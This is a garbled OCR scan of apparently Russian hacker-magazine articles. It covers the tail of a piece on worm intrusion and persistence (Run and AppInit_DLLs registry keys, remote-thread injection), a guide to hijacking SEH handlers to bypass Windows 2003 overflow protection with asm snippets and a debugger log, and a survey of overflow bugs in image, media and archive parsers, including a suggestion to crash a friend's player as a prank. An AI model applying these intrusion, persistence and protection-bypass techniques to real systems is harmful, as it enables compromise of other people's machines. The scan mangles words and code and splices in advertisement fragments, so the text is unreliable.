чен другим червем, он должен выпус- 
тить в ответ три фиолетовых. Это наи- 
более уязвимая часть операции, ведь 
если противник, то есть администра- 
тор, пронюхает об этом, вражеский 
узел без труда сможет прикинуться 


Подготовка к заброске зПе!-кода 
начинается с определения 1Р-адресов, 
пригодных GNA вторжения. 
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Червь рассылает запросы по различным IP-agpecam 


заброска гполкивы 


ву, начиненную Shell-Kogom 
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Червь получает ответ, идентифицирующий подходящую жертву, и забрасывает голо- 
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Голова переполняет буфер, захватывает управление и подтягивает основной хвост 


своим, предотвращая вторжение. Та- 
кая техника антивирусной защиты на- 
зывается вакцинацией. Для борьбы с 
ней черви раз в несколько поколений 
игнорируют признак заражения и зах- 
ватывают узел повторно, чем и при- 
водят свою популяцию к гибели, ибо 
все узлы инфицируются многократно 
и через некоторое время начинают 
кишеть червями, сжирающими все 
системные ресурсы со всеми вытека- 
ющими последствиями. 

Выбрав жертву для вторжения, 
червь посылает серверу запрос, пере- 
полняющий буфер и передающий 
бразды правления shell-Kogy, который 
может быть передан как вместе с пе- 


реполняющимся запросом, так и от- 
дельно. Такая стратегия вторжения 
называется многостадийной, и ее реа- 
лизует, в частности, червь Slapper. 
При подготовке shell-koga следует 
помнить о брандмауэрах, анализирую- 
щих содержимое запросов и отсекаю- 
щих все подозрительные пакеты. Этим 
занимаются, в том числе, фильтры 
уровня приложений. Чтобы избежать 
расстрела, shell-Kog должен соответ- 
ствовать всем требованиям специсри- 
кации протокола и быть синтаксичес- 
ки неотличимым от нормальных ко- 
манд. Ведь фильтр анализирует от- 
нюдь не содержимое (на это у него 
кишка тонка), а лишь форму запроса. 


8-41 30.2% 
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Захваченный узел становится новым бастионом для дальнейшего распространение 
червя 


Если захват управления пройдет ус- 
пешно, shell-Kog должен будет найти 
дескриптор ТСР/Р-соединения, через 
которое он был заслан, и подтянуть 
оставшийся хвост. Проще, конечно, 
было бы затащить хвост через от- 
дельное ТСРЛР-соединение, но, если 
противник окружил себя грамотно 
настроенным брандмауэром, вряд ли 
вы через него пробьетесь. А вот ис- 
пользовать уже установленные 
ТСР/Р-соединения никакой брандмау- 
эр не запрещает. 

И вот вся группа в сборе. Роем око- 
пы от забора и до обеда! Самое глу- 
noe, что только может предпринять 
спецназ, это сгрузить свою тушу в ис- 
полняемый срайл, затерявшийся в гус- 
тонаселенных трущобах 
Windows\System32 и автоматически 
загружающийся при каждом старте 
системы по ключу 
HKLM\Software\Microsoft\Windows\Cur 
rentVersion\Run. Хорошее место для 
засады, нечего сказать! Стоит дотя- 
нуться администратору gO клавиатуры, 
как от червя и мокрого места не оста- 
нется. А вот если червь внедряется в 
исполняемые срайлы на манер файло- 
вых вирусов, то его удаление потребу- 
ет намного больше времени и усилий. 

Для проникновения в адресное 
пространство чужого процесса червь 
должен либо создать в нем удален- 
ный поток, вызвав функцию 
CreateRemoteThread, либо пропат- 
чить непосредственно сам машинный 
код, вызвав WriteProcessMemory (ра- 
зумеется, речь идет лишь об МТ-по- 
добных системах, UNIX требует к себе 
принципиально иного подхода). 

Как вариант, можно прописаться в 
ветке реестра, ответственной за авто- 
матическую загрузку динамических 
библиотек в адресное пространство 
каждого запускаемого процесса: 
HKLM\SOFTWARE\Microsoft\Windows 
NT\CurrentVersion\Windows\AppInit_D 
LLs. Тогда червь получит полный 
контроль над всеми событиями, про- 
исходящими в системе, например, 
блокируя запуск неугодных ему прог- 
рамм. Интересно, сколько штанов 
протрет администратор, прежде чем 
разберется, в чем дело? 

Окопавшись в системе, червь прис- 
тупает к поиску новых жертв и рас- 
сылке своей головы по подходящим 
адресам; предварительно он умень- 
шает свой биологический счетчик на 
единицу, а когда тот достигнет нуля - 
самоликвидируется. 

Таков в общих чертах жизненный 
цикл червя, такова его карма. 


ЗАКЛЮЧЕНИЕ 

и Черви приходят из мрака небытия, 
рождаясь в подсознании своих созда- 
телей, и уходят туда же. Черви не уми- 
рают. Благодаря новым идеям они 
трансформируются, перевоплощают- 
ся. Будущее всемирной сети в ваших 
руках, друзья. 


Червяку 
лучше не 
создавать 
новых сое- 
динений, 
потому что 
ему вряд ли 
удастся 
пробиться 
через гра- 
мотно наст- 
роенный 
брандмауэр. 


Нет ничего 
хуже для 
червя, чем 
прописаться 


в 
HKLM\Softw 
are\Microsof 
t\Windows\ 
CurrentVers 
ion\Run. 
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SEH HA СЛУЖБЕ У КОНТРРЕВОЛЮЦИИ ) 


Крис Касперски aka мыщьх 


SEH НА СЛУЖБЕ 
У КОНТРРЕВОЛЮЦИИ 


РУКОВОДСТВО ПО ПЕРЕЗАПИСИ $ЕН-ОБРАБОТЧИКА 


ерезапись $ЕН-обработчика - это модный и относительно молодой механизм борьбы с защитой от переполнения 
буферов в Windows 2003 Server, также находящий себе и другие применения. Это отличный способ перехвата 
управления и подавления сообщений о критических ошибках, демаскирующих факт атаки. 


труктурной обработкой 


исключений (Structured 


Exception Handling - 


SEH в шут- 
ку расшиф- 
ровывают 
как Sexual 
Exception 
Handling. 


Защита от 
переполне- 
ния буфера, 
встроенная 
в Windows 
2003 
Server, 
функциони- 
рует именно 
на основе 
SEH. 


SEH, в шутку pacLuucp- 
ровываемый Kak Sexual 
Exception Handling) называется Mexa- 
низм, позволяющий приложениям по- 
лучать управление при возникнове- 
нии исключительных ситуаций (нап- 
ример, нарушениях доступа к памяти, 
делении на ноль, выполнении запре- 
щенной инструкции) и обрабатывать 
их самостоятельно, не вмешивая в 
это операционную систему. Необрабо- 
танные исключения приводят к ава- 
рийному завершению приложения, 
обычно сопровождающемуся всем 
известным окном "Программа выпол- 
нила недопустимую операцию и будет 
закрыта". 

Указатели на $ЕН-обработчики в по- 
давляющем большинстве случаев 
располагаются в стеке, в так называе- 
мых 5ЕН-фреймах, и переполняющие- 
ся буфера могут затирать их. Переза- 
пись ЗЕН-сфреймов обычно преследу- 
ет две цели: перехват управления пу- 
тем подмены 5ЕН-обработчика и по- 
давление аварийного завершения 
программы при возникновении иск- 
лючения. Защита от переполнения бу- 
фера, встроенная в Windows 2003 
Server, как и многие другие защиты 
данного типа, дфункционирует именно 
на основе SEH. Перехватывая SEH-06- 
работчик и подменяя его своим, мы 
тем самым перекрываем кислород за- 
щите, и она не срабатывает. 

Захватывающие перспективы, не 
правда ли? Во всяком случае, они сто- 
ят того, чтобы в них разобраться! 


КРАТКО 0 СТРУКТУРНЫХ 
ИСКЛЮЧЕНИЯХ 

ш Адрес текущего $ЕН-сфрейма со- 
держится в двойном слове по смеще- 
нию ноль от селектора FS, для извле- 
чения которого можно воспользо- 
ваться следующей ассемблерной аб- 
ракадаброй: 


mov eax,FS:[00000000h] 
mov my_var,eax. 
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Он указывает на структуру типа 
EXCEPTION_REGISTRATION, прототип 
которой описывается так: 


_EXCEPTION_REGISTRATION struc 


prev dd ? 
; адрес предыдущего ЗЕН-фрейма 
handler dd ? 


; адрес $ЕН-обработчика 
_EXCEPTION_REGISTRATION ends 


При возбуждении исключения управ- 
ление передается текущему SEH-o6pa- 
ботчику. Проанализировав ситуацию, 
$ЕН-обработчик, который представляет 
собой обычную саес-рункцию, должен 
возвратить либо 
ExceptionContinueExecution, сообщая 
операционной системе, что исключение 
успешно обработано и исполнение 
программы может быть продолжено, 
либо ExceptionContinueSearch, если он 
не знает, что с этим исключением де- 
лать, и тогда операционная система пе- 
реходит к следующему обработчику в 
цепочке (собственно говоря, возвра- 
щать управление необязательно, и 
$ЕН-обработчик может удерживать его 
хоть до бесконечности, как обработчи- 
ки, установленные °Пе!-кодом, обычно 
и поступают). 

Последним идет обработчик, назна- 
ченный операционной системой по 
умолчанию. Видя, что дело труба и ник- 
то с исключением не справляется, он 
лезет в реестр, извлекает оттуда ключ 
HKLM\SOFTWARE\Microsoft\Windows 
NT\CurrentVersion\AeDebug, и в зави- 
симости от его состояния либо прих- 
лопывает засбоившее приложение, 
либо передает управление отладчику 
(или, как вариант, Доктору Ватсону). 

При создании нового процесса опе- 
рационная система автоматически 90- 
бавляет к нему первичный SEH- 
cppelim с обработчиком по умолчанию, 
лежащий практически на самом дне 
стековой памяти, выделенной процес- 
су. "Дотянуться" go него последова- 
тельным переполнении практически 
нереально, так как для этого потребу- 
ется пересечь весь стек целиком! Та- 
ких катастрофических переполнений 
старожилы не встречали уже лет сто! 


Стартовый код приложения, прицеп- 
ляемый компоновщиком к программе, 
добавляет свой собственный обработ- 
чик (хотя и не обязан это делать), ко- 
торый также размещается в стеке на- 
много выше первичного обработчика, 
но все же недостаточно близко к пере- 
полняющимся буферам, которым пот- 
ребуется пересечь стековые фреймы 
всех материнских функций, пока они 
не доберутся до покальной памяти 
стартовой функции приложения. 

Разработчик может назначать и 
свои обработчики, автоматически соз- 
дающиеся при упоминании волшеб- 
ных слов {гу и except (такие обработ- 
чики мы будем называть пользова- 
тельскими). Несмотря на все усилия 
Microsoft основная масса программис- 
тов совершенно равнодушна к струк- 
турной обработке исключений (неко- 
торые из них даже такого слова не 
слышали!) поэтому вероятность 
встретить в уязвимой программе 
пользовательский 5ЕН-сффрейм доста- 
точно невелика, но все же она есть В 
противном случае для подмены SEH- 
обработчика (а первичный SEH-o6pa- 
ботчик в нашем распоряжении есть 
всегда) придется прибегнуть к индекс- 
ному переполнению или псевдофунк- 
ции роке, о которой уже шла речь в 
других статьях номера. 

Для исследования структурных об- 
работчиков исключений напишем не- 
хитрую программку, трассирующую 
$ЕН-оффреймы и выводящую их содер- 
жимое на экран. Законченная реализа- 
ция может выглядеть, например, так: 


main(int argc, char **агду) 


mov eax, fs:[0]; 

Mov а,еах 

mov xESP, esp 

} printf("ESP: %08Х\п",хЕЗР); 
while((int)a != -1) 
{ 


printf("EXCEPTION_REGISTRATION. prev: 
%08Xh\n"\ 


АВГУСТОВСКИЙ НОМЕР 


ЖУРНАЛА TOTAL DVD 


Откомпилировав программу и запус- , 
тив ее Ha выполнение, мы получим [дате] 
следующий результат (естественно, 
адреса 5ЕН-сфреймов и обработчиков 
в твоем случае, скорее всего, будут 
другими): 
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"Умно закрученный 

и психологически 

гониий трилитер о том, 

на что может решиться 

человек ради призрачной мечты 
о пучшей жизни - когда погоня 
становится вамнее самой цели.“ 


Борис Хохлов, Total DyD 
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Значение 
селектора, 
загруженно- 
го в регистр 
FS в Soft- 
Ice, легко 
определить 
с помощью 
команды 
CPU. 


Статью "06 
Упаковщи- 
ках В Пос- 
ледний Раз" 
можно най- 
ти по этим 
адресам: 
http://www. 
wasm.ru/art 
icle.php?arti 
cle=pack- 
lastO1 
http://www. 
wasm.ru/art 
icle.php?arti 
cle=pack- 
ers2. 


SEH HA СЛУЖБЕ У КОНТРРЕВОЛЮЦИИ ) 


Пользовательский $ЕН-сфрейм, 
сформированный ключевым словом 
{гу, лежит в непосредственной бли- 
зости от вершины стека текущей 
функции, и его отделяют всего 1Ch 
байт (естественно, конкретное значе- 
ние зависит от размера памяти, выде- 
ленной под локальные переменные, 
ну иеще кое от чего). 

Следующим в цепочке идет фрейм, 
сформированный стартовым кодом. 
Он расположен намного ниже: от 
вершины стека его отделяют аж 5Ch 
байт - и это в демонстрационной 
программе, содержащей минимум 
переменных! 

Первичный фрейм, назначаемый 
операционной системой, отстоит от 
вершины стека на целых 8Ch байт, а в 
реальных полновесных приложениях 
и того больше (идентифицировать 
первичный фрейм можно по "ненор- 
мальному" адресу $ЕН-обработчика, 
лежащего в старших адресах первой 
половины адресного пространства). 
Его линейный адрес, равный 12FFEOh, 
идентичен оля первого потока всех 
процессов, запущенных в данной вер- 
сии операционной системы, что созда- 
ет благоприятные условия gna его 
подмены. Однако для гарантирован- 
ного перехвата управления shell-kog 
должен перехватывать текущий, а не 
первичный обработчик, поскольку go 
первичного обработчика исключение 
может и не дожить. Проверь, если при 
переполнении буфера бессмыслен- 
ной строкой наподобие "ХХХХХ" воз- 
никает стандартное диалоговое окно 
критической ошибки, подменять пер- 
вичный обработчик можно, в против- 
ном случае его перезапись ничего не 
даст и зНе!-код сдохнет прежде, чем 
успеет получить управление. 

Первичный фрейм всех последую- 
щих потоков располагается на 
dwStackSize байт выше предыдущего 
фрейма, где dwStackSize - размер па- 
мяти, выделенной потоку (по умол- 
чанию 4 Мбайт на первый поток и по 
1 Мбайт на все последующие). Дора- 
ботаем нашу тестовую программу, 
включив в нее следующую строку: 

CreateThread(O, 0, (void*) main, 0,0, 
&XESP); gets(&xESP); 

Результат ее прогона можешь 
увидеть на скриншоте. 
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Результат прогона модифицированной программы 
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EXCEPTOK ВЕСТА НЫ 


Раскладка SE: 
гопоточной сред: 


реймов в памяти в мно- 


Заметно, что первичный $ЕН-фрейм 
всех потоков находится на идентич- 
ном расстоянии от текущей вершины 
стека, что существенно облегчает за- 
дачу его подмены. Первичные фрей- 
мы первого и второго потоков разне- 
сены Ha 4 Мбайт (51ЕЕОСН - 12FFEOh = 
= Ox3EFFFC ~4 Мбайт), а остальные - 
на 1 Мбайт (61FFDCh - SIFFDCh = 
= ИЕЕОСК - 61FFDCh == 10.00.00 == 
Мбайт), в общем, разобраться можно. 


Поскольку большинство серверных 
приложений конструируется по мно- 
гопоточной схеме, уметь ориентиро- 
ваться в потоках жизненно необходи- 
мо, иначе вместо перехвата управле- 
ния атакующий получит полный DoS. 


ПЕРЕХВАТ УПРАВЛЕНИЯ 

m Существует, по меньшей мере, 
два пути перехвата управления. Путь 
первый: проанализировать уязвимую 


программу и определить, какой из об- 
работчиков будет текущим на момент 
переполнения и где именно располо- 
жен его 5ЕН-фрейм (учитывая, что 
адрес последнего может быть непос- 
тоянным и зависящим от множества 
трудно прогнозируемых обстоя- 
тельств, например, от рода и характе- 
ра запросов, предшествующих пере- 
полнению). Теперь придумайте, как 
переполнить буфер так, чтобы зате- 
реть handler, подменив содержащий- 
ся в нем указатель на адрес shell-Ko- 
да. Значение поля prev не играет ни- 
какой роли (shell-kog ведь не собира- 
ется просто так возвращать таким 
трудом захваченное управление). 

Путь второй: зарегистрировать 
свой собственный 5ЕН-сфрейм. Kak 
же мы сможем что-то зарегистриро- 
вать в системе, если еще не перех- 
ватили управления? - воскликнешь 
ты. Указатель на текущий обработ- 
чик всегда содержится в одном и 
том же месте - в первом двойном 
слове Т!В'а, лежащего по адресу 
25:0000000011, и псевдофункцией 
роке его вполне реально перезапи- 
сать. Пусть вас не смущает наличие 
сегментного регистра FS - вся па- 
мять, принадлежащая процессу, 
отображается на единое адресное 
пространство, и до TIB'a можно дотя- 
нуться и через другие сегментные 
регистры, например, через тот же 
DS, используемый процессором по 
умолчанию. Естественно, при agpe- 
сации через DS ТИВ будет распола- 
гаться совсем по другому смеще- 
нию, и, чтобы его узнать, придется 
прибегнуть к услугам отладчика. Ты 
можешь использовать Soft-lce, 
Microsoft Kernel Debugger или любой 
другой отладчик по своему вкусу. 

Сначала необходимо определить 
значение селектора, загруженного в 
регистр FS. В боЙ-се за это отвечает 
команда "CPU" (если 5оН-[се настро- 
ен правильно, то все основные реги- 
стры автоматически отображаются в 
верхней части окна). Затем, просмат- 
ривая таблицу глобальных дескрип- 
торов, содержимое которой выводит 
команда "GDI", находим соответству- 
ющий ему базовый адрес. Для перво- 
го потока процесса на всех МТ-подоб- 
ных системах он равен FFDFFOOh, a 
все последующие потоки уменьшают 
его на 1000h, то есть мы получаем 
ряд указателей вида 7FFDEOOOh, 
7FFDDOOOh, 7FFDCOOOh... 

В любом случае, протестировать Ba- 
шу машину не помешает (вдруг ка- 
кая-то версия МТ поведет себя ина- 
че). Протокол работы с отладчиком 
приводится ниже. 


‘cpu 
Processor 00 Registers 
CS:EIP=0008:8046455B 
SS:ESP=0010:8047381C 
EAX=00000000 EBX=FFDFF000 
ECX=FFDFF890 EDX=00000023 


ESI=8046F870 EDI=8046F5E0 EBP=FFDFF800 EFL=00000246 


DS=0023 ES=0023 FS=0030 GS=0000 

‘gat 

Sel. Type Base Limit ODPL Attributes 
GDTbase=80036000 Limit=O3FF 

0008 Code32 00000000 FFFFFFFF О P RE 
0010 Data32 00000000 FFFFFFFF О P RW 
QOIB Code32 00000000 FFFFFFFF 3 P RE 
0023 Data32 00000000 FFFFFFFF 3 P RW 
0028 TSS32 80295000 000020AB 0 P В 
0030 Data32 FFDFFOOO OOOOIFFF 0 P RW 
003B Data32 00000000 OOOOOFFF 3 P RW 


Обрати внимание: FFDFFOOOh - это He адрес текущего 
$ЕН-фрейма. Это - указатель на фрейм. Сам же фрейм 
должен быть сформирован непосредственно в зНе!-коде, 
а в FFDFxOOOh занесен указатель на него (см. картинку). 

Затем остается лишь совершить что-нибудь недозволен- 
ное или же пустить все на самотек, дождавшись, пока ис- 
коверканная переполнением программа не вызовет иск- 
лючения естественным путем, и тогда наш ЗЕН-обработ- 
чик немедленно получит управление. Остальное, как гово- 
рится, дело техники. 


ПОДАВЛЕНИЕ АВАРИЙНОГО ЗАВЕРШЕНИЯ 
ПРИЛОЖЕНИЯ 

m Независимо от того, каким путем зПе!-код захватил yn- 
равление, он может зарегистрировать свой собственный 
обработчик структурных исключений. Это делается приб- 
лизительно так: 


PUSH handler ‚заносим адрес нашего ЗЕН-обработчика 
PUSH FS:[00000000h] ; заносим адрес на предыдущий $ЕН-фрейм 
MOV FS,[00000000h], ESP ; регистрируем новый $ЕН-фрейм 


Теперь, если shell-Kog нечаянно дотронется go запре- 
щенной ячейки или совершит другую ошибку подобного 
типа, атакуемое приложение уже не будет захлопнуто 
операционной системой. Управление вновь возвратится к 
эпе!-коду, давая ему понять, что туда ходить не надо и 
следует немедленно сменить тактику поведения, исполь- 
зуя резервные алгоритмы жизнеобеспечения. 

Исключения в процессе работы shell-kKoga могут происхо- 
дить многократно, главное - следить за тем, чтобы не пе- 
реполнился стек. Предельно допустимая степень вложен- 
ности хоть и велика, но все же не безгранична. 


ЧТО ПОЧИТАТЬ? 

и Будучи вполне легальным механизмом взаимодействия 
с операционной системой, структурная обработка исключе- 
ний неплохо документирована. Было бы очень полезно по- 
читать "F.A.Q: Exception Handling" из MSDN. Там же ты най- 
дешь замечательную статью Мэтта Питерека "A Crash 
Course оп the Depths of Win32 Structured Exception 
Handling". Из русскоязычных авторов лучше всего о струк- 
турных исключениях рассказывает Volodya - читай его 
статью "Об Упаковщиках В Последний Раз" на wasm.ru. 
Много интересного содержит также заголовочный cpain 
ЕХСРТ.Н, входящий в состав SDK. 


ЗАКЛЮЧЕНИЕ 

и В структурную обработку исключений был изначально 
заложен огромный потенциал, только-только начинающий 
раскрывать себя. Описанные здесь способы перехвата уп- 
равления - первые ласточки. За структурными исключения- 
ми - будущее! Нас ждут десятки хитроумных трюков, кото- 
рые еще предстоит найти. И какие бы изощренные защит- 
ные механизмы ни придумывались, у нас есть что им про- 
тивопоставить! EE 
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ОТРАВЛЯЕМ ПРИЛОЖЕНИЯ ) 


Докучаев Дмитрий aka Forb (forb@real.xake 


ОТРАВЛЯЕМ 
ПРИЛОЖЕНИЯ 


ПЕРЕПОЛНЕНИЯ ПРИ ОБРАБОТКЕ ДАННЫХ 


С лучаи переполнения бывают разными. Иногда буфер слетает при подсовывании слишком длинного значения, иногда - 
при обработке мудреных переменных со спецсимволами. В этой статье речь пойдет о красивых переполнениях при 
обработке специальных данных, в частности, изображений и архивов. 


СМЕРТЕЛЬНЫЕ 


КАРТИНКИ 


m Сероря инет своим 


Примеры 
переполне- 
ний приве- 
дены иск- 
лючительно 
в ознакоми- 
тельных це- 
лях! 


Порази- 
тельно, но 
для МС да- 
же не суще- 
ствует пат- 
ча, исправ- 
ляющего 
уязвимость 
при обра- 
ботке архи- 
вов. 


любимым осликом, ты 
даже не подозреваешь, 
что тебе угрожает реальная опас- 
ность. К примеру, ты решил посетить 
сайт Василия Пупкина, который накол- 
басил довольно красивую веб-стра- 
ничку. Вася предлагает просмотреть 
его порногаллерею абсолютно бесп- 
латно! Понятно, что за халяву русский 
человек готов отдать любые деньги, и 
ты, конечно, щелкаешь на линк пер- 
вой сотки. И Bgpyr осел начинает 
брыкаться. Ты думаешь, что это слу- 
чайность, и бодро кликаешь на вто- 
рую ссылку. Твой комп начинает без- 
божно тормозить, а ослик перестает 
отвечать на запросы. После нажатия 
спасительной Апу Кеу на системном 
блоке, ты бешено жмешь на третий 
линк. Как по мановению волшебной 
палочки начинают запускаться какие- 
то левые приложения, открываются 
непонятные окошки, а все пароли не- 
медленно отсылаются Васе на почту. 
Это не мои фантазии, это - реаль- 
ность. В последнее время в IE так мно- 
го уязвимостей, связанных с неверной 
обработкой рисунков, что пора писать 
книги по каждому багу. Я же ограни- 
чусь статьей, в которой постараюсь 
донести до тебя все ужасающие пос- 
ледствия переполнения рисунками. 
Самая первая брешь в обработке 
графики была найдена в конце 2002 
года. Ребята из группы eEyes нашли 
целых две уязвимости в обработке 
рпд-изображений. Первая, по их сло- 
вам, не представляла особой опаснос- 
ти (она связана с неверной интерпре- 
тацией заголовка), а вот вторая зас- 
тавляла задуматься о собственной бе- 
зопасности. Злоумышленник легко мог 
сформировать собственный рпд-файл, 
переполнить стек и выполнить произ- 
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вольный код. Уязвимость находится в 
функции inflate_fast() в файле 
pnofilt.dll. Как известно, png (как и jpg) 
подвергается сжатию по специально- 
му алгоритму аеНа{е, в спецификации 
которого используется код Хасффофма- 
на. В его основе лежит сравнение спе- 
циально подобранных копий образцов 
с символами, содержащимися в рисун- 
ке. Такая проверка происходит в вы- 
шеуказанной процедуре. Ей передает- 
ся ряд параметров, два из которых го- 
ворят о промежуточном коде и его 
длине. В основу алгоритма заложено, 
что длина кода Хасрермана, равная 
#286 и #287, является нестабильной, 
а посему запрещена. Об этом знает 
ВЕС, но не знают программисты 
Microsoft :). Саба не в состоянии про- 
верить запрещенную длину, поэтому 
параметр обрабатывается без лишней 
ругани. Правда, после задания подоб- 
ной опции происходят злые манипуля- 
ции со счетчиком цикла (оно и понят- 
но, ведь запрещенная длина понима- 
ется процедурой как нулевая). В итоге, 
получаем циклический просмотр всего 
AGb адресного пространства с после- 
дующей перезаписью выходного бу- 
фера на 32 Кб. Финальным штрихом 
будет появление popup'a с сообщени- 
ем об ошибочном обращении к памя- 
ти. Впрочем, eEyes утверждает, что 
грамотно сделанный рисунок может 
выполнить любой код на уязвимой 
системе, но насчет подобных приме- 
ров группа тактично умалчивает ;). 
Несмотря на то что прошло столько 
времени, баг до сих пор актуален. На 
фиктивное изображение можно нат- 
равить ослик без сервиспака до вер- 
сии 6.0 включительно. 

Другим багом является обработка 
Ытр-картинок. Сама уязвимость go- 
вольно свежая (первое упоминание о 
ней датировано 1 апреля сего года). 
Брешь очень тривиальна - типичная 
халатность программистов при напи- 
сании IE. При обработке Бтр-файла 
происходит извлечение его размера 
(из переданного потока данных), а за- 
тем выделение памяти под изображе- 
ние. К счастью для хакера, осел прове- 
ряет лишь соответствие с допустимым 
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размером, но никак не реальную дли- 
ну рисунка. В итоге, злоумышленник 
может сформировать специальный 
bmp-qann, в который вшит очень 
большой размер (на самом деле кар- 
тинка миниатюрна и занимает всего 
58 байт ;)). Максимальный размер, ко- 
торый может получить осел, составля- 
ет FFFFFFFF%2 (что примерно равняет- 
ся 51 гигу памяти). А если написать ряд 
<img> тегов, содержащих смертельные 
рисунки? Тогда загнется и Е, и BCA 
Винда. Я не верил в это, но стоило мне 
зайти на страницу-эксплоит, как в те- 
чение нескольких секунд WinXP наме- 
ртво подвисла. Помог только ребут ;-). 
Если не боишься повторить мой посту- 
nok, топай на ссылку hittp://www.4rman.com/ 
exploits/tinybmp.htm и не забудь nonpo- 
щаться со своей Виндой. Естественно, 
если у тебя два гига памяти и мощный 
камень, DoS от одного приложения не 
подвесит твою систему, но эфект все 
равно впечатлит. 

Примерно в то же время мир узнал 
еще об одной уязвимости Internet 
Explorer. He так давно MS лишилась 
части своих сырцов, которые благопо- 
лучно утекли в инет. Среди них были 
исходные коды IE 5.0 от Win2k. Один 
багоискатель решил посмотреть этот 
код. Он слил у кого-то сырцы, затем 
сравнил их с размером исходников 
Linux и обнаружил, что Винда весит 
больше ;). В одном из файлов злоу- 
мышленника насторожило то, что в 
коде ведется работа с целочислен- 
ными типами. Кроме того, хакер знал, 
что значение переменной bfOFfBits 
образуется путем анализа bmp-cpai- 
ла. Таким образом, взломщик собрал 
Ьтр'шник, после чтения которого 


bfOffBits принимала значение > 2431. 
Теперь представь: такая переменная 
вполне будет удовлетворять условию 
входа в цикл. После вычитания cbSkip 
принимает отрицательное значение. В 
результате, функция Read прочитает 
неверные данные (а может и не прочи- 
тать). Вообще говоря, я не слышал от- 
зывов по этой уязвимости, так как ба- 
жен, по сути, лишь IE 5.0, тест же Ha IE 
6.0, как утверждает один багопрохо- 
дец, закончился провалом. К своему 


БАМЖНЫЕ ЗАГОЛОВКИ 


заключению хакер приаттачил сфик- 
тивный отр-сфайл, который легко пе- 
реполняет буфер у пятого осла. Хо- 
чешь поэкспериментировать? Топай 
на ‚ читай 
руководство автора, анализируй 
структуру рисунка и делай соответ- 
ствующие выводы :). 

Не думай, что только один осел не 
умеет правильно обрабатывать рисун- 
ки. Если ты используешь СТК$ее вер- 
сии 0.51 (или ниже), то специальное 
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изображение с повышенной глубиной 
цвета может переполнить буфер тво- 
ей смотрелки. В качестве бонуса хакер 
получает право выполнить любой код 
под правами юзера, запустившего 
GTKSee. Наконец, даже базовая биб- 
лиотека libpng не застрахована OT уяз- 
вимости. С этой либой работает изве- 
стный GD и другие полезные програм- 
мы. Баг закрался в участке кода, кото- 
рый выдает сообщение об ошибке. 
Подставив хитрое изображение, биб- 
лиотека получает доступ к неверному 
участку памяти, после чего аварийно 
завершает свою работу. Kak cneg- 
ствие, убивается и вышестоящее при- 
ложение, которое юзает libpng. 


УБИЙСТВЕННЫЙ ЗВУК 

Подумай, как забавно будет при- 
колоться над другом, переполнив бу- 
фер в его Winamp'e. Да-да, и такое 
возможно. Для этого нужно сформи- 
ровать обычный М!О|-файл с нестан- 
дартным заголовком. В хидере указы- 
вается длинное - это обязательное ус- 
ловие - имя композиции, что и комп- 
рометирует проигрыватель на оверло- 
ag. Winamp не анализирует размер и 
при длине, равной ОХЕЕЕЕЕЕЕЕ, уходит 
в даун. Вот пример хидера MIDI, кото- 
рый появился в advisory позднее 
анонса бреши: 


Если ты повторишь подвиг авторов 
этого бага, то Winamp твоего друга 
отбросит копыта. А чтобы заставить 
его проиграть мидишку, скажи, что от- 
рыл самый крутой саундтрек к мобил- 
ке и теперь рекомендуешь его всем. 
Друг поведется как ребенок и обяза- 
тельно прослушает его ;). 


POKOBOE ВИДЕО 
Не получилось со звуком - попро- 


буем с видео. Недавний баг в восьмом » 


В ММР 9.0 
также со- 
держатся 
некоторые 
изъяны. 
Правда, не 
очень су- 
ществен- 
ные. 


К сведению, 
Орега стра- 
дает той же 
болезнью, 
что и ослик. 
Некоррект- 
ные PNG- 
изображе- 
ния могут 
перепол- 
нить буфер 
в известном 
браузере. 


BUFFER OVERFLOW 


Чтобы He 
попасться 
на удочку 
хакеру, ре- 
комендует- 
ся либо не 
использо- 
вать % в 
VirusEvent, 
либо He 
юзать ди- 
рективу во- 
обще. 


Здесь при- 
ведены не 
все приме- 
ры перепол- 
нений. Пол- 
ный список 
ищи на сай- 
тах, посвя- 
щенных 
компьютер- 
ной безо- 
пасности. 


ОТРАВЛЯЕМ ПРИЛОЖЕНИЯ ) 


-—= шв. - 


Бажный MIDI всегда готов переполнить 6) 


WMP позволяет выполнять произ- 
вольный код в системе. Любой хакер 
способен создать специальный *.asf- 
файл, который исправно откроется и 
начнет проигрываться. В процессе 
этого в WMP переполняется буфер и 
выполняется произвольный код. К со- 
жалению, никто из хакеров не уточня- 
ет причин, по которым плеер согласен 
слушаться злоумышленников. Однако 
не все так плохо: существует линк, 
позволяющий протестировать Винду 
на наличие бреши. Зайди на демон- 
страционную страничку (http://www.mal- 
ware.com/once.again!.html), активирующую 
баг в проигрывателе. Если у тебя про- 
патченный WMP или девятой версии, 
то ничего, кроме счастливого смайла, 
ты не увидишь (это очень хорошо, по- 
верь мне :)). В противном случае без 
твоего ведома откроется проводник с 
содержимым диска С^. 

Некоторые личности любят насме- 
хаться, мол, только ламеры юзают 
WMP, достойные же люди выбирают 
RealPlayer. Насмешка необоснованна: 
в последних версиях этого мегапле- 
ера затаилась брешь, позволяющая 
передать любой код. Хакер из забу- 
горья может создать некорректный 
видеосрайл, который искусно пере- 
полнит буфер и выполнит указанную 
команду. Склонность к OBepnoagy об- 


Проводник! На старт! 
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наружена в обработке R3T медийных 
файлов. Уязвимы юзеры, которые 
загружают специально обработанный 
R3T plug-in. Хотя никаких эксплоитов 
к описанию бага не прилагается, опас- 
ность уязвимости признается высо- 
кой. Так что бегом на страницу произ- 
водителя за новым релизом приложе- 
ния, пока тебя еще не хакнули. 


ОПАСНЫЕ АРХИВЫ 

m Если рассматривать тему перепол- 
нения данными в полном объеме, то 
грех обойти архиваторы. Ты, наверно, 
думал, что твой WinZip и /bin/tar рабо- 
тают правильно? В мире нет ни одной 
правильной программы (возможно, за 
исключением Hello World :). Позволь 
рассказать тебе об интересных глю- 
ках популярных запаковщиков. Все 
она основаны на общем принципе: ха- 
кер создает специальный архив, за- 
тем архиватор обрабатывает этот па- 
кет и отдает концы. Так, например, 
WinZip 9.0 может умереть после проч- 


тения спецархивов ММЕ-типа (с pac- 
ширением .mim, .uue, ‚ии, „664, .bhx, 
„Вах, и .ххе). Как утверждает элитная 
команда iDEFENSE, любой желающий 
может убить WinZip бажным архивчи- 
ком, вызвав переполнение в компо- 
ненте UUDeview. Я счел нужным не 
указывать детали переполнения, так 
как это сложно и не особенно инте- 
ресно. Если хочешь - ознакомься сам: 
http://www.securitylab.ru/43189.html. В любом 
случае, установка WinZip 9.0 Final из- 
бавит от всех напастей. 

Еще одна ошибка, о которой хоте- 
лось бы рассказать, таится в извест- 
ном менеджере Midnight Commander. 
Последний криво обрабатывает {аг- 
